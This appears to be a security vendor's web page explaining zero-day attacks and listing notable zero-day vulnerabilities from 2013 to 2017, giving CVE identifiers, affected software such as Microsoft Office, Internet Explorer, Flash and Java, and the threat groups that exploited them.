Recent Zero-Day Exploits

Standard defenses are powerless against zero-day threats

Zero-day attacks are cyber attacks against software flaws that are unknown and have no patch or fix.

It’s extremely difficult to detect zero-day attacks, especially with traditional cyber defenses. Traditional security measures focus on malware signatures and URL reputation. However, with zero-day attacks, this information is, by definition, unknown. Cyber attackers are extraordinarily skilled, and their malware can go undetected on systems for months, and even years, giving them plenty of time to cause irreparable harm.

Based on recently discovered types of zero-day attacks, it has become apparent that operating system level protection is becoming less effective, watering hole attacks are becoming more common, and cyber attacks are becoming more sophisticated and better at bypassing organizational defenses.

Recent zero-day exploits and vulnerabilities

2017 zero-day exploits

  • CVE-2017-0261 – EPS “restore” Use-After-FreeFireEye detected a “restore” use-after-free vulnerability in Encapsulated PostScript (EPS) of Microsoft Office – CVE-2017-0261 – being used to deliver SHRIME malware from a group known as Turla, and NETWIRE malware from an unknown financially motivated actor.
  • CVE-2017-0262 – Type Confusion in EPSFireEye observed APT28 using a type confusion vulnerability in Encapsulated PostScript (EPS) of Microsoft Office – CVE-2017-0262 – to deliver a GAMEFISH payload.
  • CVE-2017-0263 - win32k!xxxDestroyWindow Use-After-FreeFireEye observed APT28 using CVE-2017-0263 – a win32k!xxxDestroyWindow use-after-free vulnerability – to escalate privileges during the delivery of a GAMEFISH payload. This vulnerability was used in tandem with CVE-2017-0262.
  • CVE-2017-0199: In the Wild Attacks Leveraging HTA HandlerFireEye detected malicious Microsoft Office RTF documents leveraging CVE-2017-0199. The vulnerability allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a document containing an embedded exploit.

2016 zero-day exploits

2015 zero-day exploits

In 2015, FireEye discovered 8 of the 13 zero-day exploits.

2014 zero-day exploits

In 2014, FireEye discovered 6 of the 12 zero-day exploits.

  • CVE-2014-0322A watering hole exploit that targeted IE 10 users visiting a malicious website.
  • Internet Explorer 9 through 11 Exploit: CVE-2014-1776 A vulnerability that affected IE 6-IE 11 users, but specifically affected IE 9-IE 11 users, bypassing standard cyber defenses and allowing arbitrary memory access.
  • CVE-2014-4148A vulnerability that exploits the Windows Kernel, specifically in the Microsoft Windows TrueType Font (TTF) processing subsystem, using a Microsoft Office document to embed and deliver a malicious TTF to an international organization.
  • CVE-2014-4113Another Windows Kernel vulnerability that renders Microsoft Windows 7, Vista, XP, Windows 2000, Windows Server 2003/R2, and Windows Server 2008/R2 vulnerable to a local Elevation of Privilege (EoP) attack.
  • CVE-2014-0502A zero-day Adobe Flash exploit that affects the latest version of the Flash Player (12.0.0.4 and 11.7.700.261).
  • CVE-2014-4114SandWorm Zero Day Vulnerability Team impacting all versions of Microsoft Windows – used in Russian cyber-espionage campaign targeting NATO, European Union, Telecommunications and Energy sectors.

2013 zero-day exploits

In 2013, FireEye found 11 of the 15 zero-day exploits discovered.

  • CVE-2012-4792Hidden on the website of the Council on Foreign Relations, this malicious Javascript code targeted IE users.
  • CVE-2013-0422A Java 7-based vulnerability designed to lock Windows-based users out of their computers.
  • CVE-2013-0634Malicious ActionScript code designed to attack Adobe Flash users on Windows, Mac, Linux, and Android systems.
  • CVE-2013-0640 / CVE-2013-0641A pair of JavaScript-based PDF vulnerabilities designed to install a remote administration tool and bypass ASLR and DEP security.
  • CVE-2013-1493A Java Runtime Environment vulnerability that allowed attackers to compromise the HotSpot virtual machine to give attackers control over the targeted systems.
  • CVE-2013-1347This vulnerability in IE versions 6 through 8 targeted Windows XP users who visited the U.S. Department of Labor website.
  • CVE-2013-3918 / CVE-2014-0266A pair of far-reaching and cleverly manipulated ActiveX vulnerabilities that affected Windows users as far back as Service Pack 2.
  • CVE-2013-5065Combined with other vulnerabilities, this Window XP and Windows Server 2003 vulnerability allowed a standard user account to remotely execute code in the kernel.
  • CVE-2012-4681Details the vulnerabilities of Java run-time environments i.e., JRE 1.7x.